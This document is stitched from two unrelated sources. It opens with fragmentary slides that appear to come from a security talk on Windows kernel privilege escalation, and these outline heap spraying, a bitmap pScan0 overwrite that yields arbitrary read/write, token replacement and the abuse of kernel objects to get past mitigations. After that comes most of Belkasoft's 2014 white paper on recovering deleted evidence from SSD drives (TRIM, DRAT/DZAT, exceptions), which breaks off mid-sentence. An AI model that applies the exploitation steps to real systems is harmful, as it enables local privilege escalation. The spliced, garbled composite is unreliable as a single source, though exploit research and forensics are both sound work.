If	(dwOffet	<	(DWORD)(0x1-0xc))	{											if	(DataBuffer[dwOffset]==0x66)	{																	DataBuffer[dwOffset+0xc]=xxxx;									}	}• By default,this->Databuffer==NULL    && this->DataSize==0 • Write anywhere in x86 system.  • Not so easy in x64 system.    1.this->Databuffer must not NULL    2.this->DataSize < 0xC &&       this->DataSize!=0    3.*(this->Databuffer +        inbuf->offset)==(0x45 or 0x66) Exploitation: 
1.this->Databuffer must not NULL we	could	call	CPropertyBagMarshaler::SetBufferProperty(...)	with	property==2		to	alloc	a	buffer,	then	store	in	this->DataBuffer	

*(this->DataBuffer+inbuf->offset)==(0x45 or 0x66) Spray	lots	of	bufferX	to	enable	that		bufferX	behind	this->DataBuffer	DataBuffer	bufferX	...	Calc		inbuf->offset		value,	it	must	be	saAsfy:	bufferX	• (Databuffer+offset)	locate	in	bufferX,		(	bufferX->Filed1	)	• bufferX->Flied1	must	be	modifyable	from	usermod,		set	it	to	(0x45	or	0x66)	• (Databuffer+offset+0xc)	locate	in	bufferX,		and	it	must	be	exploitable.	DataBuffer	bufferX	...	Offset	0xc	Flied1	Flied2	
Fortunately,	we	found	bitmap	saAsfy	this	case	perfectly			DataBuffer	bitmap	...	Offset	0xc	Height	pScan0	Now,	bitmap->pScan0	has	benn	changed	to	the	value	we	set.	so	we	got	Read/Write	primary																1.	GetBitmapbits	(....)									2.	SetBitmapbits	(....)	Replace	ps	token,	exploited	!		
Complier Warning? 
WARNING!!


Mitigation & bypass 
Read/Write ability object 
1. tagWND abuse Write what? tagWND.strName ? (UNICODE_STRING)  GetWindowText ʁ NtUserDefSetText ?  Unfortunately, the destination address has been modify when write to, just desktop heap range is legal. 

Maybe 2014 
Pwn2Own:KeenTeam used once. HackingTeam leaked 0day. Someone write it to a public paper 2015.3 
Pwn2Own: We used Twice. Pwn2Own: KeenTeam used Once. 2016.3 
2016.8 2.BITMAP ABUSED 
2016.10 We use Acclerator Object To Guess Bitmap Object Address. Then We used Twice again in PwnFast. Coresecurity guys release a paper to talk about is.  

	
14393	VS	15xxx:


A New way 


But	Only	The	Object	which	Allocate	at	desktop	heap:		1. Window	2. Menu	3. InputContext	4. CallProc	
limitation But	It	is	enough,	I	believe	you	guys	could	find	something	useful!!


We are just on the way.  Thank you.   Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   SSD Forensics 2014  
Recovering Evidence from SSD Drives: Understanding TRIM , Garbage Collection  and 
Exclusions  
 
Yuri Gubanov, Oleg Afonin  
Belkasoft Research  
research@belkasoft.com  
 
We published an article on SSD forensics  in 2012. SSD self -corrosion, T RIM and garbage 
collection were  little known and poorly understood phenomena  at that time , while encrypting 
and compressing SSD contro llers were relatively uncommon . In 2014, many changes happened . 
We processed numerous cases involving the use of SSD drives  and gathered a lot of statistical 
data.  We now know more about many exclusions from SSD self -corrosion that allow forensic 
specialis ts to obtain more information from SSD drives.  
 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   Tabl e of Contents  
SSD Forensics 2014  ................................ ................................ ................................ .........................  1 
Recovering Evidence from SSD Drives: Understanding TRIM, Garbage Collection and 
Exclusions  ................................ ................................ ................................ ................................ .... 1 
Introduction  ................................ ................................ ................................ ................................ .... 3 
Checking TRIM Status  ................................ ................................ ................................ .....................  4 
SSD Technology: 2014  ................................ ................................ ................................ .....................  5 
SSD Manufacturers  ................................ ................................ ................................ .....................  6 
Hardware for SSD Forensics (and Why It Has Not Arrived)  ................................ ............................  8 
Deterministic Read After Trim  ................................ ................................ ................................ ........  8 
Acquiring Evidence from SSD Drives  ................................ ................................ .............................  11 
Scenario 1: Existin g Files Only  ................................ ................................ ................................ ... 11 
Scenario 2: Full Disk Content  ................................ ................................ ................................ .... 11 
Operating System Support  ................................ ................................ ................................ ........  12 
Old Versions of Windows  ................................ ................................ ................................ ...... 13 
MacOS X  ................................ ................................ ................................ ................................  13 
Old or Basic SSD Hardware  ................................ ................................ ................................ ... 14 
(Windows) File Systems Other than NTFS  ................................ ................................ ............  14 
External drives, USB enclosures and NAS  ................................ ................................ .............  15 
PCI-Express and PCIe SSDs  ................................ ................................ ................................ ........  16 
RAID  ................................ ................................ ................................ ................................ ...........  16 
Corrupted Data  ................................ ................................ ................................ .........................  16 
Bugs in SSD Firmware  ................................ ................................ ................................ ...............  16 
Bugs in SSD Over -Provisioning  ................................ ................................ ................................ .. 16 
SSD Shadiness: Manufacturers Bait -and-Switch  ................................ ................................ .......  17 
Small Fil es: Slack Space  ................................ ................................ ................................ .............  18 
Small Files: MFT Attributes  ................................ ................................ ................................ .......  19 
Encrypted Volumes  ................................ ................................ ................................ .......................  20 
Apple FileVault 2  ................................ ................................ ................................ .......................  20 
Microsoft BitLocker  ................................ ................................ ................................ ...................  20 
TrueCrypt  ................................ ................................ ................................ ................................ .. 20 
PGP Whole Disk Encryption  ................................ ................................ ................................ ...... 21 
Forensic Acquisition: The Right Way to Do  ................................ ................................ ...............  21 
Reality Ste ps In: Why Real SSDs are Often Recoverable  ................................ ..............................  21 
Conclusion  ................................ ................................ ................................ ................................ ..... 23 
 
 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   
Introduction  
Several years ago, Solid State drives (SSD) 
introduced a challenge to digital forensic 
speci alists . Forensic acquisition of computers 
equipped with SSD storage became  very 
different compared to acquisition of traditional 
hard drives. Instead of straightforward and 
predictable recovery of evidence , we are in the 
waters of stochastic forensics with  SSD drives, 
where nothing can be assumed as a given.   
 
With even the most recent publications not going beyond introducing the TRIM command and 
making a co nclusion on SSD self -corrosion, it has been common knowledge – and a common 
misconception, – that de leted evidence cannot be extract ed from TRIM -enabled SSD drives, 
due to the operation of background garbage collection.  
 
However, there are so many exceptions that they themselves become a rule. TRIM does not 
engage in most RAID environments or on externa l SSD drives attached as a USB enclosure or 
connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do 
not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are 
specific considerations fo r encrypted volumes stored on SSD drives, as various crypto 
containers implement vastly different methods of handling SSD TRIM commands. And what 
about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT 
attributes?  
 
Different SSD drives handle after -TRIM reads differently. Firmware bugs are common in SSD 
drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and 
garbage collection does not occur) in t he case of data corruption, for example,  if the boot 
sector or partition tables are physically wiped. Self -encrypting SSD drives require a different 
approach altogether, while SSD drives using compressing controllers cannot be practically 
imaged with off -chip acquisition hardware. Our new research co vers many areas where 
evidence is still recoverable - even on today's TRIM -enabled SSD drives.  
 
SSD Self -Corrosion  
In case you haven’t read our 2012 paper on SSD forensics , let’s stop briefly on why SSD 
forensics is different.  
 
The operating principle of SSD media (as opposed to magnetic or traditional flash -based 
storage) allows access to existing information (files and folders) stored on the disk. Deleted files 
and data that a suspect attempted to destroy (by e.g. formatting the disk , even i f “Quick 
Format” was engaged ) may be lost forever in a matter of minutes. And even shutting the 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   affected computer down immediately after a destructive command has been issued , does not 
stop  the destruction. Once the power is back on, the SSD drive will continue wiping its content 
clear all by itself, even if installed into a write -blocking imaging device . If a self-destruction 
process has already started, there is no practical way of stoppin g it unless we’re talking of some 
extremely important evidence, in which case the disk accompanied with a court order can be 
sent to the manufacturer for low -level, hardware -specific recovery . 
 
The evidence self -destruction process is triggered with the TR IM command issued by the 
operating system to the SSD controller at the time the user deletes a file, formats the disk or 
deletes a partition.  The TRIM operation is fully integrated with partition - and volume -level 
commands . This includes formatting the dis k or deleting partitions ; file system commands 
responsible for truncating  and compressin g data , and  System Restore (Volume Snapshot)  
operations . 
 
Note that  the data destruction process is only  triggered  by the TRIM command, which must be 
issued by the oper ating system.  However, in many cases the TRIM command is NOT issued. In 
this paper, we concentrate on these exclusions,  allowing investigators to gain  better 
understanding of situations when  deleted data can still be recovered from an SSD drive. 
However, b efore we begin  that part, let’s see how SSD drives of 2014 are different fr om SSD 
drives made in 2012 . 
Checking TRIM Status  
When a nalyzing a live system, it is easy to  check a TRIM status for a particular SSD device by 
issuing the following command in a te rminal window:  
 
fsutil behavior query disabledeletenotify  
 
You’ll get one of the following results : 
DisableDeleteNotify = 1  meaning that Windows TRIM commands are disabled  
DisableDeleteNotify = 0  meaning that Windows TRIM commands are enabled  
 
fsutil is a standard tool in Windows 7, 8, and 8.1.  
 
On a side note, it is possible to  enable  TRIM with “ fsutil behavior set disabledeletenotify 0 ” or 
disable TRIM with  “fsutil behavior set disabledeletenotify 1 ”. 
 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   
 
Figure 1. TRIM, image taken  from http://www.corsair.com/us/blog/how -to-check -that -trim -is-active/  
 
Note that using this command only makes sense if analyzing the SSD which is still installed in its 
original computer (e.g. during a live box analysis).  If the SSD drive is moved to a d ifferent 
system, the results of this command are no longer relevant.   
SSD Technol ogy: 2014  
Back in 2012, practically all SSD drives were already 
equipped with background garbage collection 
technology and recognized the TRIM command.  This did 
not changed i n 2014.  
 
Two years ago, SSD compression already existed in  
SandForce SSD Controller s 
(http://en.wikipedia.org/wiki/SandForce ). However, 
relatively few models were equipped with encrypting or 
compressin g controllers.  As SandForce remained the 
only compressing controller , it was easy to determine 
whether it was the case. 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   (http://www.enterprisestorageforum.com/technology/features/article.php/3930601/Real -
Time -Data -Compressions -Impact -on--SSD-Throughput -Capability -.htm ). 
 
In 2013, Intel used a custom -firmware controlled version of a SandForce cont roller to 
implement data compression in 3xx and 5xx series SSDs 
(http://www.intel.com/support/ssdc/hpssd/sb/CS -034537.htm ), claiming  reduced write 
amplification  and increased  enduran ce of a SSD  as the inherent benefits  
(http://www.intel.de/content/dam/www/public/us/en/documents/technology -briefs/ssd -520-
tech -brief.pdf ). 
 
Marvell controllers are still non -compressing ( http://blog.goplextor.com/?p=3313 ), and so are 
most other controllers on the market including the new budget option, Phison . 
 
Why so much fuzz about data comp ression in SSD drives? Because the use of any technology 
altering binary data before it ends up in the flash chips makes its recovery with third -party off -
chip hardware much more difficult.  Regardless of whether compression is present  or not , we 
have not s een many successful implementation s of SSD off -chip acquisition  products so far , 
TEEL Tech ( http://www.teeltech.com/mobile -device -forensics -training/ad vanced -bga-chip -off-
forensics/ ) being one of rare exceptions . 
 
Let’s conclude this chapter with a quote from PC World:  
 
“The bottom line is that SSDs still are a capacity game: people buy the largest amount of 
storage they can within their budget, and the y ignore the rest ”. 
http://www.pcworld.com/article/2087480/ssd -prices -face -uncertain -future -in-
2014.html  
 
In other  words, SSD’s get bigger and cheaper, ine vitably demanding some cost -saving measures 
which, in turn, may affect how deleted data are handled on these SSD drives in a way described 
later in  the Reality Steps In: Why Real SSDs are Often  Recoverable  chapter .  
SSD Manufacturers  
In recent years, we’ve seen a lot of new SSD “manufacturers” entering the arena. These 
companies don’t normally build their own hardware or design their own firmware. Instead, 
they simply spec out the disks to a real manufacturer  that assembles the drives based on one or 
another platform (typically, SandForce or Phison) and one or another type, make and size of 
flash memory . In the context of SSD forensics, these drives are of interest exactly because they 
all feature a limited choice of  chipsets and a limited number of firmware revisions. In fact, just 
two chipset makers, SandForce and Phison, enabled dozens of “manufacturers” make hundreds 
of nearly indistinguishable SSD models.  
 
So who are the real makers of SSD drives?  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com    
According to S amsung, we have the following picture:  
 
 
Figure 2. Source: http://www.kitguru.net/components/ssd -drives/anton -shilov/samsung -
remains -the-worlds -largest -maker -of-ssds -gartner/  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   Hardware for SSD Forensics  (and Why It Has Not Arrived ) 
Little  has changed since 2012 in regards to SSD -specific 
acquisition hardware. Commonly available SATA -compliant 
write -blocking forensic acquisition har dware is used 
predominantly to image SSD drives , wit h BGA flash chip 
acquisition kit s rare as hen’s teeth . 
 
Why so few chip -off solutions for SSD drives compared to 
the number of companies doing mobile chip -off? It’s hard 
to say for sure, but it’s possible  that most digital forensic 
specialists are happy with what they can extract via the 
SATA link  (while there is no similar interface in most mobile 
devices). Besides, internal data structures in today’s SSD 
drives are extremely complex. Constant remapping a nd 
shuffling of data during performance and lifespan 
optimization routines make actual data content stored on 
the flash chips inside SSD drives heavily fragmented . We’re not talking about logical 
fragmentation on file system level (which already is a probl em as SSD drives are never logically 
defragmented) , but rather physical fragmentation that makes an SSD controller scatter data 
blocks belonging to a contiguous file to various physical addresses on numerous physical flash 
chips. In particular, massive parallel writes  are what make SSD drives so much faster than 
traditional magnetic drives (as opposed to sheer writing speed of single flash chips).  
 
One more word regarding SSD acquisition hardwa re: write -blocking devices. N ote that write -
blocking imaging har dware does not stop SSD self -corrosion. If the TRIM command has been 
issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not 
some remnants of deleted data can be acquired from the SSD drive depends as much on 
acquis ition technique (and speed) , as on particular implementation of a particular SSD 
controller.  
Deterministic Read After Trim  
So let’s say we know that the suspect erased important evidence or formatted the disk just 
minutes before arrest. The SSD drive has been obtained and available for imaging. What exactly 
should an investigator expect to obtain from this SSD drive?  
 
Reported experience while recovering information from SSD drives varies greatly among  SSD 
users.  
 
Figure 3. TEEL Tech BGA Acquisition Toolkit  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   “I ran a test on my SSD drive, deleting 10 00 files and running a data recovery tool 5 minutes 
after. The tool discovered several hundred files, but an attempt to recover returned a bunch of 
empty files filled with zeroes” , said one Belkasoft customer . 
 
“We used Belkasoft Evidence Center to analyze  an SSD drive obtained from the suspect’s 
laptop. We were able to recover 80% of deleted files in several hours after they’ve been 
deleted” , said another Belkasoft user . 
 
Figure 4. Carving options in Belkasoft Evidence Center: for the experiment we set Unallocated clusters only and 
SSD drive connected as physical drive 0 . 
 
Why such a big inconsistency in user experiences ? The answer lies in the way the different SSD 
drives handle trimmed data pages.  
 
Some SSD drives implement what is called D eterministic Read After Trim (DRAT)  and 
Deterministic Zeroes After Trim (DZAT) , returning all -zeroes immediately after the TRIM 
command released a certain data block, while some other drives do not implement this 
protocol and will return the original data until it’s physically era sed with the garbage collection 
algorithm.  
 
Deterministic Read After Trim and Deterministic Zeroes After Trim have been part of the SATA 
specification for a long time.  Linux  users can verify that their SSD drives are using DRAT or DZAT 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   by issuing the hdparm –I command  returning whether the drive supports TRIM and does 
"Deterministic Read After Trim ". 
 
Example:  
 
$ sudo hdparm -I /dev/sda | grep -i trim 
           *    Data Set Management TRIM supported (limit 1 block)  
           *    Deterministic read data after TRIM  
 
However, the adoption of DRAT has been steadily increasing among SSD manufacturers. Two 
years ago we often saw reports on SSD drives with and without DRAT support. In 201 4, the 
majority of new models ca me equipped with DRAT or DZAT.  
 
There are  three different types of TRIM defined in the SATA protocol and implemented in 
different SSD drives.  
 
 Non -deterministic TRIM : each read command after a Trim may return different data.  
 Deterministic Trim (DRAT): all read commands after a TRIM shall return t he same data, 
or become determinate.  Note that this level of TRIM does not necessarily return all -
zeroes when trimmed pages are accessed.  Instead, DRAT guarantees that the data 
returned when accessing a trimmed page will be the same (“determined”) before a nd 
after the affected page has been processed by the garbage collection algorithm and 
until the page is written new data.  As a result, the data returned by SSD drives 
supporting DRAT as opposed to DZAT can be all zeroes or other words of data, or it 
could be the original pre -trim data stored in that logical page.  The essential point here is 
that the values read from a trimmed logical page do not change since the moment the 
TRIM command has been issued and  before the moment new data get  written into that 
logical page.  
 Deterministic Read Zero after Trim (DZAT): all read commands after a TRIM  shall return 
zero es until the page is written new data.  
 
As we can see, in some cases the SSD will return non -original data (all zeroes, all ones, or some 
other non -origin al data)  not because the physical blocks have been cleaned immediately 
following the TRIM command,  but because the SSD controller tells that there is no valid data 
held at the  trimmed address on a  logical level previously associated with the trimmed physic al 
block . 
 
If, however, one could possibly read the data directly from the physical blocks mapped to the 
logical blocks that have been trimmed , then the original data could be obtained from those 
physical blocks until the blocks are physically erased by th e garbage collector. Apparently, there 
is no way to address the physical data blocks vi a the standard ATA command set, however, the 
disk manufacturer could most probably do this in their own lab. As a result, sending the 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   trimmed SSD disk for recovery to th e manufacturer may be a viable proposition if some 
extremely important evidence is concerned.  
 
Notably, DRAT is not implemented in Windows, as NTFS does not allow applications reading the 
trimmed data.  
Acquiring Evid ence from SSD Drives  
So far the only pra ctical way of obtaining evidence from an SSD drive remains the traditional 
imaging (with dedicated  hardware/software combination), followed by an analysis with an 
evidence discovery tool (such as Belkasoft Evidence Center, 
http://forensic.belkasoft.com/en/bec/en/evidence_center.asp ). 
 
We now know more about the expected outcome when analyzing an SSD drive.  There are 
generally two scenarios: either the SSD only contains existing data  (files and folders, traces of 
deleted data in MFT attributes, unallocated space carrying no information), or the SSD contains 
the full information (destroyed evidence still available in unallocated disk space). Today, we can 
predict which scenario is going  to happen by investigating conditions in which the SSD drive has 
been used.  
Scenario 1: Existing Files Only  
In this scenario, the SSD may contain some files and folders, but free disk space will be truly 
empty (as in “filled with zero data”). As a result,  carving free disk space will return no 
information or only traces of information, while carving the entire disk space will only return 
data contained in existing files. So, is file carving useless on SSD drives? No way! Carving is the 
only practical way o f locating moved or hidden evidence (e.g. renamed history files or 
documents stored in the Windows \System32 folder and renamed to .SYS or .DLL).  
 
Practically speaking, the same acquisition and analysis methods should be applied to an SSD 
drive as if we wer e analyzing a traditional magnetic disk. Granted, we’ll recover no or little 
destroyed evidence, but any evidence contained in existing files including e.g. , deleted records 
from SQLite databases (used, for example, in Skype histories) can still be recover ed 
(http://forensic.belkasoft.com/en/recover -destroyed -sqlite -evidence -skype -and-iphone -logs). 
Scenario 2: Full Disk Content  
In the second scenario, th e SSD disk will still contain the complete set of information – just like 
traditional magnetic disks. Obviously, all the usual techniques should be applied at the analysis 
stage including file carving.  
 
Why would an SSD drive NOT destroy evidence as a res ult of routine garbage collection? The 
garbage collection algorithm erasing the content of released data blocks does not occur if the 
TRIM command has not been issued, or if the TRIM protocol is not supported by any link of the 
chain. Let’s see in which ca ses this could happen.  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   
 
Figure 5. More than 1000 items were carved out of unallocated sectors of SSD hard drive , particularly, Internet 
Explorer history, Skype conversations, SQLite databases , system files  and other forensically important types of 
data  
Operating Sy stem Support  
TRIM is a property of the operating system as much as it is the property of an SSD device. Older 
file systems do not support TRIM. Wikipedia http://en.wikipedia.org/wiki/Trim_(comput ing) 
has a comprehensive table detailing the operating system support for the TRIM command.  
 
Operating 
System  Supported since  Notes  
DragonFly 
BSD 2011 -05 May 2011   
FreeBSD  2010 -078.1 - July 
2010  Support was added at the block device layer in 8.1. File 
system  support was added in FreeBSD 8.3 and FreeBSD 9, 
beginning with UFS. ZFS trimming support was added in 
FreeBSD 9.2. FreeBSD 10 will support trimming o n 
software RAID configurations.  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   Linux  2008 -12-252.6.28 –
25 December 2008  Initial support for discard  operations was added for FTL 
NAND flash devices in 2.6.28. Support for the ATA Tr im 
command was added in 2.6.33.   
Not all file systems  make use of Trim. Among the file 
systems  that can issue Trim requests automatically  are 
Ext4, Btrfs,  FAT, GFS2 and XFS. However, this is disabled by 
default , due to performance concerns, but it can be 
enabled by setting the "discard" mount option. Ext3, 
NILFS2 and OCFS2 offer ioctls to perform offline trimming. 
The Trim specification calls for supporting a list of trim 
rang es, but as of kernel 3.0 trim is only invoked with a 
single range that is slower.  
Mac OS X  2011 -06-2310.6.8  –
23 June 2011  Although the AHCI block device driver gained the ability to 
display whether a device supports the Trim operation in 
10.6.6 (10J3210),  the functionality itself remained 
inaccessible until 10.6.8, when the Trim operation was 
exposed via the IOStorageFamily and file system  (HFS+) 
support was added. Some online forums  state that Mac OS 
X only supports Trim for Apple -branded SSDs; third -party 
utilities are available to enable it for other brands.  
Microsoft 
Windows  2009 -10NT 6.1 
(Windows  7 and 
Windows Server 
2008 R2) – October 
2009  Windows 7 only supports trim for ordinary (SATA) drives 
and does not support this command for PCI -Express SSDs 
that are different type of device, even if the device itself 
would a ccept the command. It is confirmed that with 
native Microsoft drivers the Trim command works in AHCI 
and legacy IDE / ATA Mode.  
OpenSolaris  2010 -07 July 2010   
Android  2013 -74.3 - 24 July 
2013   
Old Versions of Windows  
As shown in the table above, TRIM support was only added to Windows 7. Obviously, TRIM is 
supported in Windows 8 and 8.1. In Windows Vista and earlier, the TRIM protocol is not 
supported, and the TRIM command is not issued. As a result, when analyzing an SSD drive 
obtained from a system fe aturing one of the older versions of Windows, it is possible to obtain 
the full content of the device.  
 Possible exception:  TRIM -like performance can be enabled via certain third -party 
solutions (e.g. Intel SSD Optimizer, a part of Intel SSD Toolbox).  
MacO S X 
Mac OS X started supporting the TRIM command for Apple supplied SSD drives since version 
10.6.8 . Older builds of Mac OS X do not support TRIM.  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com    
Notably, user -installed SSD drives not supplied by Apple itself are excluded from TRIM support.  
Old or Basi c SSD Hardware  
Not all SSD drives support TRIM and/or background garbage collection. Older SSD drives as well 
as SSD -like flash media used in basic tablets and sub -notes (such as certain models of ASUS Eee)  
do not support the TRIM command. For example, Int el started manufacturing TRIM -enabled 
SSD drives with drive lithography of 34nm (G2) ; their 50nm SSDs  do not have TRIM support .  
 
In reality, few SSD drives without TRIM survived that long.  Many entry -level sub -notebooks use 
flash -based storage often misla beled as “SSD” that does not feature garbage collection or 
supports the TRIM protocol.  
(Windows) File System s Other than NTFS  
TRIM is a feature of the file system as much as the property of an SSD drive. At this time, 
Windows only supports TRIM on NTFS -formatted partitions. Volumes formatted with FAT, 
FAT32  and exFAT  are excluded.  
 
Notably, some (older) SSD drives used trickery to work around the lack of TRIM support by 
trying to interpret the file system, attempting to erase dirty blocks not referenced fro m the file 
system. This approach, when enabled, only works for the FAT file system since it’s a published 
spec. 
(http://www.snia.org/sites/default/files2/sdc_archives/2009_presentations/thursday/NealChri
stiansen_ATA_TrimDeleteNotification_Windows7.pdf ) 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   External drives, USB enclosures and NAS  
The TRIM command is fully supported over the SATA interface, inc luding the eSATA extension, 
as well as SCSI via the UNMAP command. If an SSD drive is used in a USB enclosure  or installed 
in most models of NAS devices , the TRIM command will not be communicated via the 
unsupported interface.  
 
  
Figure 6.  
 
There is a notable e xception. Some NAS manufacturers start recognizing the demand for units 
with ultra -high performance, low power consumption and noise free operation provided by SSD 
drives, slowly adopting TRIM in some of their models.  At the time of this writing, of all 
manufacturers only Synology  appears to support TRIM in a few select models  of NAS devices 
and SSD drives . 
 
Here is a quote from Synology  Web site ( https://www.synology.com/en -uk/support/faq/591 ):  
 
SSD TRIM improves the read and write performance of volumes created on SSDs, 
increasing efficiency as well as extending the lifetime of your SSDs. See the list below for 
verified SSD with TRIM support.  
 
 You may customize a schedule to choose when the sy stem will perform TRIM.  
 SSD TRIM is not available when an SHA cluster exists.  
 TRIM cannot be enabled on iSCSI LUN.  
 The TRIM feature under RAID 5 and 6 configurations can only be enabled on  the SSDs 
with DZAT (Deterministic Read Zero after TRIM) support. Pl ease contact your SSD 
manufacturers for details on DZAT support.    
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   PCI-Express and PCIe SSDs  
Interestingly, the TRIM command is not natively supported by any version of Windows for  many  
high -performance SSD drives occupying the PCI Express slot. Do not confu se PCI Express SSD’s 
with SATA drives carrying M.2 or mSATA interfaces . 
 
 Possible exception:  TRIM -like performance can be enabled via certain third -party 
solutions (e.g. , Intel SSD Optimizer, a part of Intel SSD Toolbox).  
RAID  
The TRIM command is not yet supported over RAID configurations (with few rare exceptions). 
SSD drives working as part of a RAID array can be analyzed.  
 
A notable exception from this rule would be the modern RAID 0 setup using a compatible 
chipset (such as Intel H67, Z77, Z87, H87,  Z68) accompanied with the correct drivers (the latest 
RST driver from Intel allegedly works) and a recent version of BIOS. In these configurations, 
TRIM can be enabled.  
Corrupted Data  
Surprisingly, SSD drives with corrupted system areas (damaged partition tab les, skewed file 
systems , etc.) are easier to recover than healthy ones. The TRIM command is not issued over 
corrupted areas because f iles are not properly deleted. T hey simply become invisible or 
inaccessible to the operating systems. Many commercially av ailable data recovery tools (e.g. , 
Intel® Solid -State Drive Toolbox with Intel® SSD  Optimizer, OCZ SSD Toolbox) can reliably 
extract information from logically corrupted SSD drives.  
Bugs in SSD Firmware  
Firmware u sed in SSD drives may  contain bugs, often a ffecting the TRIM functionality and/or 
messing up garbage collection.  Just to show  an example, OCZ Agility 3 120  GB shipped with 
buggy firmware v. 2.09, in which TRIM did not work. Firmware v. 2.15 fixed TRIM behavior, 
while v. 2.22 introduced issues with data loss on wake -up after sleep, then firmware v. 2.25 
fixed that but disrupted TRIM operation again (information taken from 
http://www. overclock.net/t/1330730/ocz -firmware -2-25-trim -doesnt -work -bug-regression -
bad-ocz-experience ). A particular SSD drive may or may not be recoverable depending on which 
bugs were present in its firmware.  
Bugs in SSD Over -Provisioning  
SSD over -provisioning i s one of the many wear -leveling mechanisms intended for increasing 
SSD life span. Some areas on the disk are reserved on the controller level, meaning that a 120 
GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called 
over-provisioning area (OP area), and can be used by SSD controllers when a fresh block is 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   required for a write operation.  A dirty block will then enter the OP pool, and will be erased by 
the garbage collection mechanism during the drive’s idle time.  
 
Speak ing of SSD over -provisioning, f irmware bugs can affect TRIM behavior in other ways, for 
example, revealing trimmed data after a reboot/power off.  Solid -state drives are remapping 
constantly after TRIM  to allocate addresses out of the OP pool. As a result,  the SSD reports a 
trimmed data block as writeable (already erased) immediately  after TRIM. Obviously, the drive 
did not have the time to actually c lean old data from that block. I nstead, it simply maps a 
physical block from the OP pool to the address refe rred t o by the trimmed logical block.  
What happens to the data stored in the old block? For a while, it contains the original data (in 
many cases it’s compressed data, depending on the SSD controller). However, as that data 
block is mapped out of the addre ssable logical space, the original data is no longer accessible or 
addressable.  
 
Sounds complex? You bet. That’s why even seasoned SSD manufacturers may not get it right at 
the first try (e.g. as discussed on OCZ Technology Forum at  
http://www.ocztechnologyforum.com/forum/showthread.php?96382 -Deterministic -Read -
After -Trim ). Issues like this cause issues when, after deleting data and rebooting the PC, s ome 
users would see the old data back as if it was never deleted . Apparently, because of the 
mapping issue the new pointers would not work as they should , due to a bug in the drive’s 
firmware. OCZ released a firmwar e fix to correct this behavior, but simil ar (or other) bugs may 
still affect other drives.  
SSD Shadiness: Manufacturers Bait -and -Switch  
When choosing an SSD drive, customers tend to read online reviews. Normally, when the new 
drive gets released, it is getting reviewed by various sources soon aft er it becomes available. 
The reviews get published, and customers often base their choice on them . 
 
But what if a manufacturer silently changes the drive’s specs without changing the model 
number? In this case, an SSD drive that used to have great reviews suddenly becomes much less 
attractive. This is exactly what happened with some manufacturers. According to ExtremeTech 
(http://www.extremetech.com/extreme/184253 -ssd-shadiness -kingston -and-pny-caught -bait-
and-switching -cheaper -components -after -good -reviews ), two well -known SSD manufacturers, 
Kingston and PNY , were  caught bait -and-switching cheaper component s after getting the good 
reviews . In this case, the two m anufacturers were launching their SSDs with one hardware 
specific ation, and then quietly changed  the hardware configuration after reviews have gone 
out. 
 
So what’s in there for us? Well, the forensic -friendly SandForce controller was found in the 
second revision of PNY Optima drive s. Instead of the original Silicon Motion controller, the new 
batch of PNY Optima drives had a different, SandForce -based controller  known for its less -than -
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   perfect implemen tation of garbage collection leaving data on the disk for a long time after it’s 
been deleted.  
Small Files: Slack Space  
Remnants of deleted evidence can be acquired from so -called slack space as well as from MFT 
attributes.  
 
In the word of SSD, the term “ slack space” receives a new meaning. Rather than being a matter 
of file and cluster size alignment, “slack space” in SSD drives deals with the different sizes of 
minimum writeable and minimum erasable blocks on a physical level.  
 
Micron, the manufacturer o f NAND chips used in many SSD drives, published a comprehensive 
article on SSD structure:  
https://www.micron.com/ ~/media/Documents/Products/Technical%20Marketing%20Brief/ssd
_effect_data_placement_writes_tech_brief.pdf  
 
In SSD terms, Page  is the smallest unit of storage that can be written to. The typical page size of 
today’s SSD is 4 KB or 8 KB.  
 
 
Figure 7.  
 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   Block , on the ot her hand, is the smallest unit of storage that can be erased. Depending on the 
design of a particular SSD drive, a single block may contain 128 to 256 pages.   
 
As a result, if a file is deleted and its size is less than the size of a single SSD data block,  OR if a 
particular SSD data block contain pages  that still remain allocated, that particular block is NOT 
erased by the garbage collection algorithm.  In practical terms, this means that files or file 
fragments (chunks) sized less than 512 KB or less than 2 MB depending on SSD model, may not 
be affected by the TRIM command, and may still be forensically recoverable.  
 
However, the implementation of the Deterministic Read After Trim  (DRAT) protocol by many 
recent SSD drives makes trimmed pages inaccessible vi a standard SATA commands.  If a 
particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual 
data may physically reside on the drive for a long time, yet it will be unavailable to forensic 
specialists via standard acquisitio n techniques. Sending the SSD drive to the manufacturer 
might be the only way of obtaining this information on a physical level.  
Small Files: MFT Attributes  
Most hard drives used in Windows systems are using NTFS as their file system. NTFS stores 
